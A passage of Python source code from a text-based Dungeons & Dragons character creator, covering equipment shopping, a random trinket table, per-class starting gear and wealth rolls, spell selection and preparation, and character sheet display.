else:\n equipments.remove(last_chosen)\n\n already_chosen.pop()\n if len(already_chosen) > 0:\n last_chosen = already_chosen[-1]\n else:\n last_chosen = None\n\n else:\n return 'GO BACK'\n\n elif groups[chosen] == 'EXIT':\n return 'EXIT'\n\n else:\n print('\\nSorry, not a valid number. Please try again.')\n\n if not isinstance(chosen, str):\n already_chosen.append(chosen)\n last_chosen = chosen\n\n if isinstance(chosen, tuple):\n chosen = create_simple_list(chosen)\n else:\n chosen = [chosen]\n\n equipments += chosen\n\n clear_terminal()\n try:\n choice = copy_list[item_number]\n except IndexError:\n error = True\n\n return equipments\n\n\ndef buy_equipment(starting_wealth, fixed_price=True):\n equipments = []\n wealth = starting_wealth\n\n finished = False\n while not finished:\n dictionary = index['EQUIPMENT'].copy()\n visited = []\n end = False\n wealth = starting_wealth\n equipments = []\n\n while not end:\n clear_terminal()\n\n options = {}\n selection_number = 1\n for name, item in dictionary.items():\n if isinstance(item, dict):\n key = f'{name}'\n else:\n # If it isn't a dictionary, it's a object possible to choose\n key = f'{name:27s}' \\\n f'Cost (gp): {str(item.cost):18s}' \\\n f'Weight (lb.): {item.weight:2.2f}' \\\n\n options[key] = item\n selection_number += 1\n\n selected = select(\n options=options,\n prompt=f'You have {wealth} gp to spend in equipment\\n'\n f'You can choose in the options for equipment:',\n show_type='key',\n return_type='value',\n single_item=True\n )\n\n if isinstance(selected, dict):\n if dictionary not in visited:\n visited.append(dictionary)\n dictionary = selected\n\n elif selected == 'GO BACK':\n if len(visited) >= 1:\n dictionary = visited[-1]\n visited.remove(dictionary)\n else:\n return ['GO BACK', 'GO BACK']\n\n elif selected == 'EXIT':\n end = True\n\n else:\n # A item was selected\n if fixed_price:\n price = selected.cost\n else:\n price = get_a_number(\n 'The price suggested for this item in the Player\\'s'\n f'Handbook is of {selected.cost} gp.\\n'\n 'How much are you paying for it?'\n )\n\n if price is not None:\n if wealth - price >= 0:\n equipments.append(selected)\n wealth -= price\n wealth = round(wealth, 2)\n\n if wealth == 0:\n end = True\n\n else:\n # The user bought a item, but could not afford it.\n print('')\n print(\n \"Sorry. It appears you don't have the means \"\n 'necessaries to buy this item. 
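# The equipment_options convention consumed by choose_equipment above: each
# inner list is one choice to make, and a tuple inside it is a bundle taken
# together. A hypothetical miniature with strings standing in for the Weapon
# objects used later in create_class:
equipment_options = [
    ['rapier', 'longsword'],                       # choice 1: either weapon
    [('handaxe', 'handaxe'), ['light_crossbow']],  # choice 2: a bundled pair, or a crossbow
]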
Please try again or '\n 'type BACK or EXIT'\n )\n\n clear_terminal()\n options = ['CONFIRM', 'RESTART']\n choice = select(\n options=options,\n prompt='You finished shopping for equipments.\\n'\n 'Select what to do now.',\n single_item=True,\n go_back=False,\n )\n\n if choice != 'RESTART':\n finished = True\n\n if choice == 'EXIT':\n equipments = None\n wealth = None\n\n return [equipments, wealth]\n\n\ndef random_trinket():\n trinkets = [\n Trinket('Mummified goblin hand'),\n Trinket('Piece of crystal that faintly glows in the moonlight'),\n Trinket('Gold coin minted in an unknown land'),\n Trinket('Diary written in a language you don\\'t know'),\n Trinket('Brass ring that never tarnishes'),\n Trinket('Old chess piece made from glass'),\n Trinket(\n 'Pair of knucklebone dice, each with a skull symbol on the side '\n 'that would normally show six pips'\n ),\n Trinket(\n 'Small idol depicting a nightmarish creature that gives you '\n 'unsettling dreams when you sleep near it'\n ),\n Trinket('Rope necklace from which dangles four mummified elf fingers'),\n Trinket('Deed for a parcel of land in a realm unknown to you'),\n Trinket('1-ounce block made from an unknown material'),\n Trinket('Small cloth doll skewered with needles'),\n Trinket('A tooth form an unknown beast'),\n Trinket('Enormous scale, perhaps from a dragon'),\n Trinket('Bright green feather'),\n Trinket('Old divination card bearing your likeness'),\n Trinket('Glass orb filled with moving smoke'),\n Trinket('1-pound egg with a bright red shell'),\n Trinket('Pipe that blows bubbles'),\n Trinket(\n 'Glass jar containing a weird bit of flesh floating '\n 'in pickling fluid'\n ),\n Trinket(\n 'A tiny gnome-crafted music box that plays a song you dimly '\n 'remember from your childhood'\n ),\n Trinket('Small wooden statuette of a smug halfling'),\n Trinket('Brass orb etched with strange runes'),\n Trinket('Multicolored stone disk'),\n Trinket('Tiny silver icon of a raven'),\n Trinket(\n 'Bag containing forty-seven humanoid teeth, '\n 'one of which is rotten'\n ),\n Trinket('Shard of obsidian that always feels warm to the touch'),\n Trinket('Dragon\\'s bony talon hanging from a plain leather necklace'),\n Trinket('Pair of old socks'),\n Trinket(\n 'Blank book whose pages refuse to hold any substance of marking'\n ),\n Trinket('Silver badge in the shape of a five-pointed star'),\n Trinket('Knife that belonged to a relative'),\n Trinket('Glass vial filled with nail clippings'),\n Trinket(\n 'Rectangular metal device with two tiny metal cups on one end '\n 'that throws sparks when wet'\n ),\n Trinket('White, sequined glove sized for a human'),\n Trinket('Vest with one hundred tiny pockets'),\n Trinket('Small, weightless stone block'),\n Trinket('Tiny sketch portrait of a goblin'),\n Trinket('Empty glass vial that smells of perfume when opened'),\n Trinket(\n 'Gemstone that looks like a lump of coal when '\n 'examined by anyone but you'\n ),\n Trinket('Scrap of cloth from an old banner'),\n Trinket('Rank insignia from a lost legionnaire'),\n Trinket('Tiny silver bell without a clapper'),\n Trinket('Mechanical canary inside a gnomish lamp'),\n Trinket(\n 'Tiny chest carved to look like it has '\n 'numerous feet on the bottom'\n ),\n Trinket('Dead sprite inside a clear glass bottle'),\n Trinket(\n 'Metal can that has no opening but sounds as if it is filled with'\n 'liquid , sand, spiders, or broken glass (your choice)'),\n Trinket(\n 'A glass orb filled with water, in '\n 'which swims a clockwork goldfish'\n ),\n Trinket('Silver spoon with 
an M engraved on the handle'),\n Trinket('Whistle made from gold-colored wood'),\n Trinket('Dead scarab beetle the size of your hand'),\n Trinket('Two toy soldiers, one with a missing head'),\n Trinket('Small box filled with different-sized buttons'),\n Trinket('Candle that can\\'t be lit'),\n Trinket('Tiny cage with no door'),\n Trinket('Old key'),\n Trinket('Indecipherable treasure map'),\n Trinket('Hilt from a broken sword'),\n Trinket('Rabbit\\'s foot'),\n Trinket('Glass eye'),\n Trinket('Cameo carved in the likeness of a hideous person'),\n Trinket('Silver skull the size of a coin'),\n Trinket('Alabaster mask'),\n Trinket('Pyramid of sticky black incense that smells very bad'),\n Trinket('Nightcap that, when worn, gives you pleasant dreams'),\n Trinket('Single caltrop made from bone'),\n Trinket('Gold monocle frame without the lens'),\n Trinket('A 1-inch cube, each side painted a different color'),\n Trinket('Crystal knob from a door'),\n Trinket('Small packet filled with pink dust'),\n Trinket(\n 'Fragment of a beautiful song, written as '\n 'musical notes on two pieces of parchment'\n ),\n Trinket('Silver teardrop earring made from a real teardrop'),\n Trinket(\n 'Shell of an egg painted with scenes of '\n 'human misery in disturbing detail'\n ),\n Trinket('Fan that, when unfolded, shows a sleeping cat'),\n Trinket('Set of bone pipes'),\n Trinket(\n 'Four-leaf clover pressed inside a book '\n 'discussing manners and etiquette'\n ),\n Trinket(\n 'Sheet of parchment upon which is drawn '\n 'a complex mechanical contraption'\n ),\n Trinket('Ornate scabbard that fits no blade you have found so far'),\n Trinket('Invitation to a party where a murder happened'),\n Trinket(\n 'Bronze pentacle with an etching of a rat\\'s head in its center'\n ),\n Trinket(\n 'Purple handkerchief embroidered with '\n 'the name of a powerful archmage'\n ),\n Trinket(\n 'Half of a floorplan for a temple, '\n 'castle, or some other structure'\n ),\n Trinket(\n 'Bit of folded cloth that, when unfolded, turns into a stylish cap'\n ),\n Trinket('Receipt of deposit at a bank in a far-flung city'),\n Trinket('Diary with seven missing pages'),\n Trinket(\n 'Empty silver snuffbox bearing an inscription '\n 'the surface that says \"dreams\"'\n ),\n Trinket('Iron holy symbol devoted to an unknown god'),\n Trinket(\n 'Book that tells the story of a legendary hero\\'s rise and fall, '\n 'with the last chapter missing'\n ),\n Trinket('Vial of dragon blood'),\n Trinket('Ancient arrow of elven design'),\n Trinket('Needle that never bends'),\n Trinket('Ornate brooch of dwarven design'),\n Trinket(\n 'Empty wine bottle bearing a pretty label that says \"The '\n 'Wizard of Wines Winery, Red Dragon Crush, 331422-W\"'\n ),\n Trinket('A mosaic tile with a multicolored, glazed surface'),\n Trinket('Petrified mouse'),\n Trinket(\n 'Black pirate flag adorned with a dragon\\'s skull and crossbones'\n ),\n Trinket(\n 'Tiny mechanical crab or spider that moves '\n 'about when it\\'s not being observed'),\n Trinket(\n 'Glass jar containing lard with a label '\n 'that reads \"Griffon Grease\"'\n ),\n Trinket(\n 'Wooden box with a ceramic bottom that holds a living '\n 'worm with a head on each end of its body'\n ),\n Trinket('Metal urn containing the ashes of a hero'),\n ]\n\n d100 = Dice(maximum=100)\n\n if config['DICE ROLL'] == 'VIRTUAL':\n number = d100.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n number = get_typed_dice(\n dice=d100,\n objective='define your random trinket.'\n )\n\n number -= 1\n\n print(f'You won a trinket: 
{trinkets[number].name}')\n print('Press ENTER to continue')\n input()\n\n return trinkets[number]\n\n\ndef get_variant(variant_name):\n \"\"\"\n The function gets if the user selected to use the variant instead of the\n default version of its background.\n :param variant_name: Name of the possible variant in the user's background\n :return: boolean, if the user chosen or not the variant\n \"\"\"\n variant = None\n\n if variant_name:\n prompt = f\"There's the variant {variant_name.title()} for your class!\"\n\n answer = select(\n options=['YES', 'NO'],\n prompt=prompt,\n single_item=True,\n go_back=False,\n finish=False,\n )\n if answer == 'YES':\n variant = True\n else:\n variant = False\n else:\n print('It appears that your class has no variant option.')\n\n clear_terminal()\n\n return variant\n\n\ndef deal_other_options(characteristic, characteristic_list):\n \"\"\"\n If the user selected to randomize its background characteristics or to\n write its own version of it.\n :param characteristic: chosen characteristic by the user\n :param characteristic_list: list of all possible pre-chosen characteristics\n :return: the proper characteristic, be a random version or the write in.\n \"\"\"\n if characteristic == 'RANDOM':\n characteristic = characteristic_list[\n randint(0, len(characteristic_list) - 1)\n ]\n elif characteristic == 'WRITE IN':\n characteristic = input('Write what you want: ')\n\n return characteristic\n\n\ndef select_level():\n answer = select(\n options=['WRITE LEVEL'],\n prompt='It is time to select your initial level.',\n single_item=True\n )\n\n if answer == 'WRITE LEVEL':\n level = None\n loop = True\n\n while loop:\n level = get_a_number(\n prompt='What is your initial level?',\n go_back_message=False\n )\n\n if level is None:\n print('\\nYour level must be a number.')\n print('Press ENTER to continue...')\n input()\n clear_terminal()\n else:\n if level < 1 or level > 20:\n print('\\nPlease insert a number between 1 and 20.')\n print('Press ENTER to continue...')\n input()\n else:\n loop = False\n\n clear_terminal()\n else:\n level = answer\n\n return level\n\n\ndef create_class(classe, level, abilities):\n \"\"\"\n This function gets all the necessary info to create an object of the class\n Class and create it for the user.\n :param classe: string with the name of the chosen class\n :param level: int of the level number selected\n :param abilities: Abilities object with the abilities of the user\n :return: object of the class Class\n \"\"\"\n\n if classe == 'BARBARIAN':\n equipment_options = [\n [\n index['EQUIPMENT']['WEAPON']['MARTIAL']['MELEE']\n ],\n [\n (\n handaxe,\n handaxe\n ),\n [\n index['EQUIPMENT']['WEAPON']['SIMPLE']\n ]\n ],\n ]\n chosen_equipment = [\n packs['EXPLORER'],\n javelin,\n javelin,\n javelin,\n javelin\n ]\n wealth_dice = Dice(number=2, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = 10 * wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = 10 * get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Barbarian(\n level=level,\n equipment_options=equipment_options,\n equipment=chosen_equipment,\n starting_wealth=starting_wealth\n )\n\n elif classe == 'BARD':\n equipment_options = [\n [\n rapier,\n longsword,\n index['EQUIPMENT']['WEAPON']['SIMPLE']\n ],\n [\n tuple(packs['DIPLOMAT']),\n tuple(packs['ENTERTAINER'])\n ],\n [\n index['EQUIPMENT']['TOOLS']['MUSICAL INSTRUMENT']\n ],\n ]\n wealth_dice = Dice(number=5, maximum=4)\n if config['DICE ROLL'] == 
'VIRTUAL':\n starting_wealth = 10 * wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = 10 * get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Bard(\n abilities=abilities,\n level=level,\n equipment_options=equipment_options,\n equipment=[leather_armor, dagger],\n starting_wealth=starting_wealth\n )\n\n elif classe == 'CLERIC':\n equipment_options = [\n [\n mace,\n warhammer\n ],\n [\n scale_mail_armor,\n leather_armor,\n chain_mail_armor\n ],\n [\n index['EQUIPMENT']['WEAPON']['SIMPLE']\n ],\n [\n tuple(packs['PRIEST']),\n tuple(packs['EXPLORER'])\n ],\n [\n index['EQUIPMENT']['ADVENTURING GEAR']['HOLY SYMBOL']\n ]\n ]\n wealth_dice = Dice(number=5, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = 10 * wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = 10 * get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Cleric(\n abilities=abilities,\n level=level,\n equipment_options=equipment_options,\n equipment=[shield],\n starting_wealth=starting_wealth\n )\n\n elif classe == 'DRUID':\n equipment_options = [\n [\n shield,\n index['EQUIPMENT']['WEAPON']['SIMPLE']\n ],\n [\n scimitar,\n index['EQUIPMENT']['WEAPON']['SIMPLE']['MELEE']\n ],\n [\n index['EQUIPMENT']['ADVENTURING GEAR']['DRUIDIC FOCUS']\n ]\n ]\n wealth_dice = Dice(number=2, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = 10 * wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = 10 * get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Druid(\n abilities=abilities,\n level=level,\n equipment_options=equipment_options,\n equipment=[leather_armor, packs['EXPLORER']],\n starting_wealth=starting_wealth,\n )\n\n elif classe == 'FIGHTER':\n equipment_options = [\n [\n [\n chain_mail_armor\n ],\n (\n leather_armor,\n longbow\n )\n ],\n [\n index['EQUIPMENT']['WEAPON']['MARTIAL']\n ],\n [\n shield,\n index['EQUIPMENT']['WEAPON']['MARTIAL'],\n ],\n [\n (\n handaxe,\n handaxe\n ),\n [\n light_crossbow\n ]\n ],\n [\n tuple(packs['DUNGEONEER']),\n tuple(packs['EXPLORER'])\n ]\n ]\n wealth_dice = Dice(number=5, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = 10 * wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = 10 * get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Fighter(\n abilities=abilities,\n level=level,\n equipment_options=equipment_options,\n starting_wealth=starting_wealth\n )\n\n elif classe == 'MONK':\n equipment_options = [\n [\n shortsword,\n index['EQUIPMENT']['WEAPON']['SIMPLE']\n ],\n [\n tuple(packs['DUNGEONEER']),\n tuple(packs['EXPLORER'])\n ],\n ]\n chosen_equipment = [\n dart, dart, dart, dart, dart, dart, dart, dart, dart, dart\n ]\n wealth_dice = Dice(number=5, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Monk(\n level=level,\n equipment_options=equipment_options,\n equipment=chosen_equipment,\n starting_wealth=starting_wealth,\n )\n\n elif classe == 'PALADIN':\n equipment_options = [\n [\n index['EQUIPMENT']['WEAPON']['MARTIAL']\n ],\n [\n shield,\n index['EQUIPMENT']['WEAPON']['MARTIAL']\n ],\n [\n (\n javelin,\n javelin,\n javelin,\n javelin,\n javelin\n 
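# either five javelins or any simple melee weapon (PHB paladin option)\n                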
),\n [\n index['EQUIPMENT']['WEAPON']['SIMPLE']['MELEE']\n ]\n ],\n [\n tuple(packs['PRIEST']),\n tuple(packs['EXPLORER'])\n ],\n [\n index['EQUIPMENT']['ADVENTURING GEAR']['HOLY SYMBOL']\n ]\n ]\n wealth_dice = Dice(number=5, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = 10 * wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = 10 * get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Paladin(\n abilities=abilities,\n level=level,\n equipment_options=equipment_options,\n equipment=[chain_mail_armor],\n starting_wealth=starting_wealth\n )\n\n elif classe == 'RANGER':\n print('Choose two simple melee weapons to be offered to you later:')\n equipment_options = [\n [\n scale_mail_armor,\n leather_armor\n ],\n [\n (\n shortsword,\n shortsword\n ),\n (\n choose_equipment(\n [[index['EQUIPMENT']['WEAPON']['SIMPLE']['MELEE']]]\n )[0],\n choose_equipment(\n [[index['EQUIPMENT']['WEAPON']['SIMPLE']['MELEE']]]\n )[0],\n )\n ],\n [\n tuple(packs['DUNGEONEER']),\n tuple(packs['EXPLORER'])\n ],\n ]\n wealth_dice = Dice(number=5, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = 10 * wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = 10 * get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Ranger(\n abilities=abilities,\n level=level,\n equipment_options=equipment_options,\n equipment=[longbow],\n starting_wealth=starting_wealth,\n )\n\n elif classe == 'ROGUE':\n equipment_options = [\n [\n rapier,\n shortsword\n ],\n [\n shortbow,\n shortsword\n ],\n [\n tuple(packs['BURGLAR']),\n tuple(packs['DUNGEONEER']),\n tuple(packs['EXPLORER'])\n ],\n ]\n chosen_equipment = [\n leather_armor,\n dagger,\n dagger,\n thieves_kit\n ]\n wealth_dice = Dice(number=4, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = 10 * wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = 10 * get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Rogue(\n abilities=abilities,\n level=level,\n equipment_options=equipment_options,\n equipment=chosen_equipment,\n starting_wealth=starting_wealth,\n )\n\n elif classe == 'SORCERER':\n equipment_options = [\n [\n index['EQUIPMENT']['WEAPON']['SIMPLE']\n ],\n [\n component_pouch,\n index['EQUIPMENT']['ADVENTURING GEAR']['ARCANE FOCUS']\n ],\n [\n tuple(packs['DUNGEONEER']),\n tuple(packs['EXPLORER'])\n ],\n ]\n wealth_dice = Dice(number=3, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = 10 * wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = 10 * get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Sorcerer(\n abilities=abilities,\n level=level,\n equipment_options=equipment_options,\n equipment=[dagger, dagger],\n starting_wealth=starting_wealth\n )\n\n elif classe == 'WARLOCK':\n equipment_options = [\n [\n index['EQUIPMENT']['WEAPON']['SIMPLE']\n ],\n [\n component_pouch,\n index['EQUIPMENT']['ADVENTURING GEAR']['ARCANE FOCUS']\n ],\n [\n tuple(packs['SCHOLAR']),\n tuple(packs['DUNGEONEER'])\n ],\n [\n index['EQUIPMENT']['WEAPON']['SIMPLE']\n ],\n ]\n wealth_dice = Dice(number=4, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = 10 * wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = 10 * get_typed_dice(\n dice=wealth_dice,\n objective='define your starting 
wealth.'\n )\n\n classe = Warlock(\n abilities=abilities,\n level=level,\n equipment_options=equipment_options,\n equipment=[leather_armor, dagger, dagger],\n starting_wealth=starting_wealth,\n )\n\n elif classe == 'WIZARD':\n equipment_options = [\n [\n quarterstaff,\n dagger\n ],\n [\n component_pouch,\n index['EQUIPMENT']['ADVENTURING GEAR']['ARCANE FOCUS']\n ],\n [\n tuple(packs['SCHOLAR']),\n tuple(packs['EXPLORER'])\n ],\n ]\n wealth_dice = Dice(number=4, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = 10 * wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = 10 * get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Wizard(\n abilities=abilities,\n level=level,\n equipment_options=equipment_options,\n equipment=[spellbook],\n starting_wealth=starting_wealth\n )\n\n classe.features = create_simple_list(classe.features)\n\n classe.equipment = create_simple_list(classe.equipment)\n classe.equipment = group_equipment(classe.equipment)\n\n return classe\n\n\ndef print_abilities(character):\n print(\n f'Abilities: '\n f'STR '\n f'DEX '\n f'CON '\n f'INT '\n f'WIS '\n f'CHA '\n )\n print(\n f' '\n f\"{character.abilities.values['STR']:02d} \"\n f\"({character.abilities.score('STR'):+}) \"\n f\"{character.abilities.values['DEX']:02d} \"\n f\"({character.abilities.score('DEX'):+}) \"\n f\"{character.abilities.values['CON']:02d} \"\n f\"({character.abilities.score('CON'):+}) \"\n f\"{character.abilities.values['INT']:02d} \"\n f\"({character.abilities.score('INT'):+}) \"\n f\"{character.abilities.values['WIS']:02d} \"\n f\"({character.abilities.score('WIS'):+}) \"\n f\"{character.abilities.values['CHA']:02d} \"\n f\"({character.abilities.score('CHA'):+}) \"\n )\n\n\ndef print_main_info(character):\n headline = '\\nLevel ' \\\n + 'Proficiency ' \\\n + 'AC ' \\\n + 'HP ' \\\n + 'Speed ' \\\n + 'Alignment ' \\\n + 'Initiative ' \\\n + 'Background'\n\n values = f'{character.general_info[\"LEVEL\"]:02d} ' \\\n + f'{character.proficiencies[\"VALUE\"]:02d} ' \\\n + f'{character.general_stats[\"AC\"]} ' \\\n + f'{character.general_stats[\"CURRENT HP\"]:03d} ' \\\n + f'{character.general_stats[\"SPEED\"]} ' \\\n + f'{character.general_info[\"ALIGNMENT\"].title():15s} ' \\\n + f'{character.general_stats[\"INITIATIVE\"]} ' \\\n + f'{character.general_info[\"BACKGROUND\"].title()}'\n\n print(headline)\n print(values)\n\n\ndef show_character_info(character):\n clear_terminal()\n\n print_name(\n name=character.personal_info[\"CHARACTER'S NAME\"].title(),\n category=f'{character.general_info[\"RACE\"].title()} '\n + f'{character.general_info[\"CLASS\"].title()}'\n )\n print_abilities(character)\n print_main_info(character)\n print('')\n\n\ndef select_cantrips(character):\n cantrips_to_select = character.magical_ability.cantrips_known \\\n - len(character.magical_ability.cantrips)\n possible_cantrips = index['CANTRIPS'][character.general_info['CLASS']]. 
\\\n copy()\n\n for cantrip in character.magical_ability.cantrips:\n possible_cantrips.remove(cantrip)\n\n clear_terminal()\n print(\n f'As a {character.general_info[\"CLASS\"]}, you have '\n f'{cantrips_to_select} cantrips to select:\\n'\n )\n\n cantrips = select(\n options=possible_cantrips,\n quantity=cantrips_to_select,\n prompt='You have cantrips to select.',\n )\n\n return cantrips\n\n\ndef select_spells(character):\n added_spells = []\n for level, spells in character.magical_ability.spells.items():\n added_spells += spells\n\n spells_to_select = character.magical_ability.spells_known - len(\n added_spells)\n\n all_spells = {}\n class_spells_by_level = index['SPELLS'][character.general_info['CLASS']]\n\n max_spell_slot = None\n for level, slots in character.magical_ability.spell_slots.items():\n if slots > 0:\n max_spell_slot = level\n\n for level, spells in class_spells_by_level.items():\n if level <= max_spell_slot:\n for spell in spells:\n if spell not in added_spells:\n all_spells[spell] = level\n\n clear_terminal()\n print(\n f'As a {character.general_info[\"CLASS\"]}, you have '\n f'{spells_to_select} spells up to level {max_spell_slot} to select:\\n'\n )\n all_spells_list = list(all_spells.keys())\n spells_list = select(\n options=all_spells_list,\n quantity=spells_to_select,\n prompt='You have spells to select.',\n )\n\n if spells_list not in [['EXIT'], ['GO BACK']]:\n spells = {}\n for level in range(1, max_spell_slot + 1):\n if level not in spells:\n spells[level] = []\n\n spells_list += added_spells\n for spell in spells_list:\n spells[all_spells[spell]].append(spell)\n else:\n spells = spells_list[0]\n\n return spells\n\n\ndef prepare_spells(character, finish=True):\n magical_ability = character.magical_ability\n\n if magical_ability.has_magic is None:\n return None\n\n if magical_ability.prepare_spells is not True:\n return None\n\n spells_to_prepare = []\n if magical_ability.spells_known == -1:\n for lvl, spells in index['SPELLS'][magical_ability.spell_list].items():\n if magical_ability.spell_slots[lvl] > 0:\n spells_to_prepare += spells\n\n elif magical_ability.spells_known > 0:\n for level, spells in magical_ability.spells.items():\n spells_to_prepare += spells\n\n if len(spells_to_prepare) == 0:\n return None\n\n prepared_spells = select(\n options=spells_to_prepare,\n quantity=magical_ability.number_prepared_spells,\n prompt='Select the spells that you are gonna have prepared.',\n single_item=True,\n go_back=False,\n finish=finish,\n )\n\n if prepared_spells in ['GO BACK', 'EXIT']:\n return prepared_spells\n\n list_prepared_spells = prepared_spells.copy()\n dict_prepared_spells = {}\n for spell in list_prepared_spells:\n for lvl, spells in index['SPELLS'][magical_ability.spell_list].items():\n if spell in spells:\n try:\n dict_prepared_spells[lvl].append(spell)\n except KeyError:\n dict_prepared_spells[lvl] = [spell]\n\n prepared_spells = dict_prepared_spells\n character.magical_ability.prepared_spells = prepared_spells\n\n return None\n\n\ndef get_dict_with_units(original):\n return_dict = {}\n\n for equipment in original:\n if equipment in return_dict:\n return_dict[equipment] += 1\n else:\n return_dict[equipment] = 1\n\n return return_dict\n\n\ndef check_spells(character):\n if len(character.magical_ability.cantrips) \\\n < character.magical_ability.cantrips_known:\n new_cantrips = select_cantrips(character)\n\n if new_cantrips not in ['EXIT', 'GO BACK']:\n character.magical_ability.set_cantrips(new_cantrips)\n save_sheet(character)\n\n elif new_cantrips == 
'EXIT':\n return 'EXIT'\n\n elif character.magical_ability.cantrips_known == -1:\n character.magical_ability.set_cantrips([])\n\n spells_list = []\n for spells in character.magical_ability.spells.values():\n spells_list += spells\n\n if len(spells_list) < character.magical_ability.spells_known:\n new_spells = select_spells(character)\n\n if new_spells not in ['EXIT', 'GO BACK']:\n character.magical_ability.set_spells(new_spells)\n save_sheet(character)\n elif new_spells == 'EXIT':\n return 'EXIT'\n\n if character.magical_ability.prepare_spells:\n if len(character.magical_ability.prepared_spells) == 0:\n result = prepare_spells(character)\n if result in ['EXIT']:\n return result\n else:\n save_sheet(character)\n\n return None\n\n\ndef print_spells(spells_dict):\n max_spell_showed = 0\n\n for level, spells in spells_dict.items():\n max_spell_showed = level\n ordinal = get_ordinal(level)\n\n print_name(f'{level}{ordinal} level spells')\n print('')\n for spell in spells:\n print(f'- {spell.title()}')\n print('')\n\n return max_spell_showed\n\n\ndef show_spells(character, enter_continue=True, show_empty=True):\n magical_ability = character.magical_ability\n\n print_name('Cantrips')\n print('')\n if len(magical_ability.cantrips) == 0:\n print('No cantrip to show here!')\n else:\n for cantrip in magical_ability.cantrips:\n print(f'- {cantrip.title()}')\n print('')\n\n max_spell_showed = 0\n if magical_ability.prepare_spells:\n if len(magical_ability.prepared_spells) > 0:\n max_spell_showed = print_spells(magical_ability.prepared_spells)\n else:\n if len(magical_ability.spells) > 0:\n max_spell_showed = print_spells(magical_ability.spells)\n\n if show_empty:\n for level in range(\n max_spell_showed + 1,\n magical_ability.highest_spell_level + 1\n ):\n ordinal = get_ordinal(level)\n\n print_name(f'{level}{ordinal} level spells')\n print('')\n print('No spell to show here!')\n print('')\n\n if enter_continue:\n print('')\n print('Press ENTER to continue')\n input()\n\n\ndef show_character(character):\n answer = None\n while answer != 'GO BACK':\n show_character_info(character)\n\n what_to_see = [\n 'SAVING THROWS',\n 'SKILLS',\n 'LANGUAGES',\n 'PROFICIENCY IN EQUIPMENTS',\n 'EQUIPMENT',\n 'FEATURES',\n 'PERSONAL INFO',\n 'SPELLS',\n ]\n\n answer = select(\n options=what_to_see,\n single_item=True,\n clean=False,\n finish=False,\n )\n\n if answer == 'SAVING THROWS':\n show_character_info(character)\n\n for ability in index['ABILITIES']:\n total = character.abilities.score(ability)\n if ability in character.proficiencies[\"SAVING THROWS\"]:\n saving_throw = f'+ {character.proficiencies[\"VALUE\"]} '\n total += character.proficiencies[\"VALUE\"]\n else:\n saving_throw = ' '\n\n print(\n f'{ability.title()}: '\n f'{character.abilities.score(ability):02d} '\n f'{saving_throw} '\n f'= {total:02d}'\n )\n\n print(\"\\nPress ENTER to continue\")\n input()\n\n elif answer == 'SKILLS':\n show_character_info(character)\n\n for skill, ability in index['SKILLS'].items():\n total = character.abilities.score(ability)\n\n if skill in character.proficiencies[\"SKILLS\"]:\n proficiency = f'+ {character.proficiencies[\"VALUE\"]} '\n total += character.proficiencies[\"VALUE\"]\n else:\n proficiency = ' '\n\n name = f'{skill.title()} ({ability})'\n\n print(\n f'{name:25s}: '\n f'{character.abilities.score(ability):02d} '\n f'{proficiency}'\n f'= {total:3d}'\n )\n\n print('\\nPress ENTER to continue')\n input()\n\n elif answer == 'LANGUAGES':\n show_character_info(character)\n\n character.languages = 
